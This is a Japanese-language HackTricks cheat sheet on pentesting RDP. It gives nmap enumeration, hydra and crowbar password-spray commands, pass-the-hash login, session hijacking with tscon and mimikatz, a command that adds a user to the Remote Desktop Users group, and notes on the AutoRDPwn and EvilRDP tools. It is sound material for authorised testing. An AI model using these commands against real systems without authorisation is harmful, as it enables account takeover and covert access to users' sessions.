hacktricks/network-services-pentesting/pentesting-rdp.md

3389 - RDPペネトレーションテスト

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ会社で働いていますか？HackTricksで会社の広告を掲載したいですか？または、最新のPEASSバージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？サブスクリプションプランをチェックしてください！
• The PEASS Familyを発見し、独占的なNFTsのコレクションをご覧ください。
• 公式のPEASS & HackTricksグッズを入手してください。
• 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦@carlospolopmをフォローしてください。
• ハッキングのコツを共有するために、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。**

DragonJAR Security Conferenceは、国際的なサイバーセキュリティイベントで、2023年9月7日と8日にコロンビアのボゴタで開催されます。10年以上の歴史を持つこのイベントは、世界中のハッカーや研究者を引き付けるスペイン語での最新の研究が発表される技術的な内容が豊富です。 以下のリンクから今すぐ登録し、この素晴らしいカンファレンスをお見逃しなく！:

{% embed url="https://www.dragonjarcon.org/" %}

基本情報

リモートデスクトッププロトコル（RDP）は、Microsoftによって開発された独自のプロトコルで、ユーザーがネットワーク接続を介して別のコンピュータにグラフィカルインターフェースで接続することを可能にします。この目的のために、ユーザーはRDPクライアントソフトウェアを使用し、もう一方のコンピュータはRDPサーバーソフトウェアを実行する必要があります（こちらから）。

デフォルトポート: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

列挙

自動

{% code overflow="wrap" %}

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

{% endcode %}

利用可能な暗号化とDoS脆弱性をチェックし（サービスにDoSを引き起こさずに）、NTLM Windowsの情報（バージョン）を取得します。

ブルートフォース

注意：アカウントをロックする可能性があります

パスワードスプレー

注意：アカウントをロックする可能性があります

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

既知のクレデンシャル/ハッシュを使用して接続

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

既知のクレデンシャルをRDPサービスに対してチェックする

impacketのrdp_check.pyは、いくつかのクレデンシャルがRDPサービスに対して有効かどうかをチェックすることができます:

rdp_check <domain>/<name>:<password>@<IP>

攻撃

セッション盗み

SYSTEM権限を持っていると、所有者のパスワードを知らなくても、任意のユーザーによって開かれたRDPセッションにアクセスできます。

開かれたセッションを取得:

query user

選択したセッションへのアクセス

tscon <ID> /dest:<SESSIONNAME>

選択したRDPセッションの内部に入ると、Windowsのツールと機能のみを使用してユーザーになりすますことができます。

重要：アクティブなRDPセッションにアクセスすると、それを使用していたユーザーはログオフされます。

プロセスをダンプしてパスワードを取得することもできますが、この方法ははるかに速く、ユーザーの仮想デスクトップと対話することができます（ディスクに保存されていないメモ帳のパスワード、他のマシンで開かれている他のRDPセッションなど...）

Mimikatz

これを行うためにmimikatzを使用することもできます：

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

スティッキーキー & Utilman

この技術をスティッキーキーまたはutilmanと組み合わせることで、管理者CMDと任意のRDPセッションにいつでもアクセスできます。

これらの技術でバックドアが設置されたRDPを検索するには、次のリンクを使用します: https://github.com/linuz/Sticky-Keys-Slayer

RDP プロセスインジェクション

異なるドメインの誰かが、またはより高い権限を持つユーザーがRDP経由でログインした場合、あなたが管理者であれば、彼のRDPセッションプロセスにビーコンをインジェクトし、彼として行動することができます:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

ユーザーをRDPグループに追加

net localgroup "Remote Desktop Users" UserLoginName /add

自動ツール

• AutoRDPwn

AutoRDPwnはPowershellで作成されたpost-exploitationフレームワークで、主にMicrosoft Windowsコンピューターに対するShadow攻撃を自動化するために設計されています。この脆弱性（Microsoftによって機能としてリストされている）は、リモート攻撃者が被害者のデスクトップを彼の同意なしに見ることを可能にし、オペレーティングシステム自体のネイティブツールを使用して、要求に応じてそれを制御することさえできます。

• EvilRDP
• コマンドラインから自動的にマウスとキーボードを制御
• コマンドラインから自動的にクリップボードを制御
• RDP経由でターゲットにネットワーク通信をチャネルするクライアントからSOCKSプロキシを生成
• ファイルをアップロードせずにターゲット上で任意のSHELLおよびPowerShellコマンドを実行
• ターゲット上でファイル転送が無効になっている場合でも、ターゲットへのファイルのアップロードおよびダウンロード

HackTricks自動コマンド

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference は国際的なサイバーセキュリティイベントです**](https://www.dragonjarcon.org/)。これは10年以上の歴史を持ち、2023年9月7日と8日にコロンビアのボゴタで開催されます。技術的な内容が豊富で、最新の研究がスペイン語で発表され、世界中のハッカーや研究者を引き寄せます。
以下のリンクから今すぐ登録し、この素晴らしいカンファレンスをお見逃しなく！:

{% embed url="https://www.dragonjarcon.org/" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* **サイバーセキュリティ会社**で働いていますか？ **HackTricksで会社を宣伝**したいですか？ それとも、**最新版のPEASSを入手**したり、**HackTricksをPDFでダウンロード**したいですか？ [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください！
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのコツを共有するために、** [**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**

</details>